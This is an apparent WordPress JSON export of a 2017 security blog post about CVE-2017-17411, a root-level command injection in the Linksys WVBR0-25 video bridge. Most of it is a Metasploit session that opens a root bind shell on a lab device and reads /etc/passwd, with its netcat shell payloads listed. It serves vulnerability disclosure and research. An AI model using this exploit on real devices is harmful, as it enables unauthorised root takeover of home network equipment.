{"id":3056,"date":"2017-12-26T03:19:45","date_gmt":"2017-12-26T03:19:45","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=3056"},"modified":"2017-12-26T03:19:45","modified_gmt":"2017-12-26T03:19:45","slug":"cve-2017-17411-linksys-wvbr0-25-command-injection","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=3056","title":{"rendered":"CVE-2017-17411: Linksys WVBR0 25 Command Injection"},"content":{"rendered":"<p>Recently a security researcher Ricky Lawshae from <strong>Trend Micro<\/strong><em> discover a critical vulnerability on Linksys Wireless Bridge WVBR0-25 this allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. <\/em><\/p>\n<p>Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Getting a Root Shell on a Linksys WVBR0 25<\/strong><\/p>\n<p><iframe title=\"Getting a Root Shell on a Linksys WVBR0 25\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/3gUjBnNGLKM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p><strong>Exploit:<\/strong><br \/>\nexploit\/linux\/http\/linksys_wvbr0_user_agent_exec_noauth Metasploit module<\/p>\n<p>This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to \u201c; #. This can be verified against WVBR0-25 devices running firmware &lt; 1.0.41.<\/p>\n<pre>msf &gt; use exploit\/linux\/http\/linksys_wvbr0_user_agent_exec_noauth \nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; info\nName: Linksys WVBR0-25 User-Agent Command Execution\nModule: exploit\/linux\/http\/linksys_wvbr0_user_agent_exec_noauth\nPlatform: Unix\nPrivileged: Yes\nLicense: Metasploit Framework License (BSD)\nRank: Normal\nDisclosed: 2017-12-13\nProvided by:\nHeadlessZeke\nAvailable targets:\nId  Name\n--  ----\n0   Automatic\nBasic options:\nName     Current Setting  Required  Description\n----     ---------------  --------  -----------\nProxies                   no        A proxy chain of format type:host:port[,type:host:port][...]\nRHOST                     yes       The target address\nRPORT    80               yes       The target port\nSSL      false            no        Negotiate SSL\/TLS for outgoing connections\nVHOST                     no        HTTP server virtual host\nPayload information:\nSpace: 1024\nDescription:\nThe Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to \nconnect wireless Genie cable boxes to the Genie DVR, is vulnerable \nto OS command injection in version &lt; 1.0.41 of the web management portal via the User-Agent header. Authentication is not required to exploit this vulnerability. References: http:\/\/cvedetails.com\/cve\/2017-17411\/ http:\/\/www.zerodayinitiative.com\/advisories\/ZDI-17-973 https:\/\/www.thezdi.com\/blog\/2017\/12\/13\/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair msf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; show payloads \nCompatible Payloads\n===================\nName                     Disclosure Date  Rank    Description\n----                     ---------------  ----    -----------\ncmd\/unix\/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)\ncmd\/unix\/generic                          normal  Unix Command, Generic Command Execution\ncmd\/unix\/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set payload cmd\/unix\/bind_netcat \npayload =&gt; cmd\/unix\/bind_netcat\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set RHOST 10.0.0.104\nRHOST =&gt; 10.0.0.104\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; exploit\n[*] 10.0.0.104:80 - Trying to access the device ...\n[*] Started bind handler\n[*] 10.0.0.104:80 - Exploiting...\n[*] Command shell session 1 opened (10.0.0.109:40541 -&gt; 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600\nid\nuid=0(root) gid=0(root)\n^C\nAbort session 1? [y\/N]  y\n[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set payload cmd\/unix\/generic \npayload =&gt; cmd\/unix\/generic\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set cmd cat \/etc\/passwd\ncmd =&gt; cat \/etc\/passwd\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; exploit\n[*] 10.0.0.104:80 - Trying to access the device ...\n[*] 10.0.0.104:80 - Exploiting...\n[+] 10.0.0.104:80 - Command sent successfully\n[*] 10.0.0.104:80 - Command output:  root:x:0:0::\/:\/bin\/sh nobody:x:99:99:Nobody:\/:\/bin\/nologin sshd:x:22:22::\/var\/empty:\/sbin\/nologin admin:x:1000:1000:Admin User:\/tmp\/home\/admin:\/bin\/sh quagga:x:1001:1001:Quagga\n[*] Exploit completed, but no session was created.\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt;\n<\/pre>\n<p>Reference:<\/p>\n<ul>\n<li><a href=\"http:\/\/zerodayinitiative.com\/advisories\/ZDI-17-973\/\" target=\"_blank\" rel=\"nofollow external noopener noreferrer\" data-wpel-link=\"external\">http:\/\/zerodayinitiative.com\/advisories\/ZDI-17-973\/<\/a><\/li>\n<li><a href=\"http:\/\/www.cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17411\" target=\"_blank\" rel=\"nofollow external noopener noreferrer\" data-wpel-link=\"external\">http:\/\/www.cve.mitre.org<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/9336\" target=\"_blank\" rel=\"nofollow external noopener noreferrer\" data-wpel-link=\"external\">https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/9336<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Recently a security researcher Ricky Lawshae from Trend Micro discover a critical vulnerability on Linksys Wireless Bridge WVBR0-25 this allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the<\/p>\n","protected":false},"author":1,"featured_media":3060,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[638,688,431,615],"tags":[735,736,737,738],"class_list":["post-3056","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-router-exploitation","category-shellsploit","category-vulnerability-analysis","category-vulnerability-scanner","tag-linksys","tag-root","tag-vulnerability","tag-wvbr0"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3056"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3056\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}